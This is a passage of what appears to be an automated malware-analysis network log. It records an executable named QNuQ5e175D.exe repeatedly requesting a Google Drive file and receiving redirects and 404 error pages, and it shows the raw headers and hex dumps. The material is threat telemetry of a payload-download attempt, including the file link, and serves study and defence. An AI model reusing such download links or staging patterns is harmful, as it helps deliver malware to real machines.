                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IxcYK7J-Ow_JY7s8f8l_Lg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.1150006172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:30 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:31 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:30 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-iIbLIyqDwvXHMy28tD_Abg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.1150007142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:31 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:32 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC4_zGRq38DJbxSjMEtoyzJ7nzRxVC8JPPIxpocg3HUVjrF9j_o21eD24yzMhQfBIQMQ
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:32 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-iRdevWkGAm8sdGXYbHy-_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:32 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 75 4a 55 72 5a 2d 66 62 4c 6a 6b 6e 5a 57 36 79 74 41 7a 41 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zuJUrZ-fbLjknZW6ytAzAQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.1150008172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:32 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:33 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:33 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-pDsmKsePd-doQq1HXRjUBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      29192.168.2.1150009142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:33 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:34 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQXvR-tNun8oF6h2AJeaiM-s_JBDeo1NU9sAJFSmQacNubRX_LWFOvDadNiIAOsQr8xuGKw_9c
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:34 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-Sr-QOMmIQmf3bT0lgyT03g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:34 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 76 30 69 45 38 6a 78 76 36 48 59 6b 2d 61 59 4d 58 72 76 46 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hv0iE8jxv6HYk-aYMXrvFg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      30192.168.2.1150010172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:35 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:35 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:35 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-O6PHzXdKzQlb11snWSF4FQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      31192.168.2.1150011142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:36 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:36 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgRra7MWenIshM3a-QP2-m8yXQFvprUxQzcmwhIrcVXR1PcE1StUuTPeV-Wo1ZGvFV5qvh2q58M
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:36 GMT
                                                      Content-Security-Policy: script-src 'nonce-7A2aM0fmOZd6YDBTFBZkMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:36 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 56 2d 6c 76 79 47 52 36 31 49 49 57 68 69 78 4a 41 37 78 2d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HV-lvyGR61IIWhixJA7x-A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      32192.168.2.1150012172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:37 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:37 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:37 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-H6bzgUX1Je4ck82K8y8T9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      33192.168.2.1150013142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:38 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:38 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgSZyitYiO5EdNtK-X7LCxuP3F6eoV2fKRHBh9YP8rCDEI_bndV51fwn3pJnUjU7fGvqhFXdqWA
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:38 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-NXrNcZZndc15c350Ma_XUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
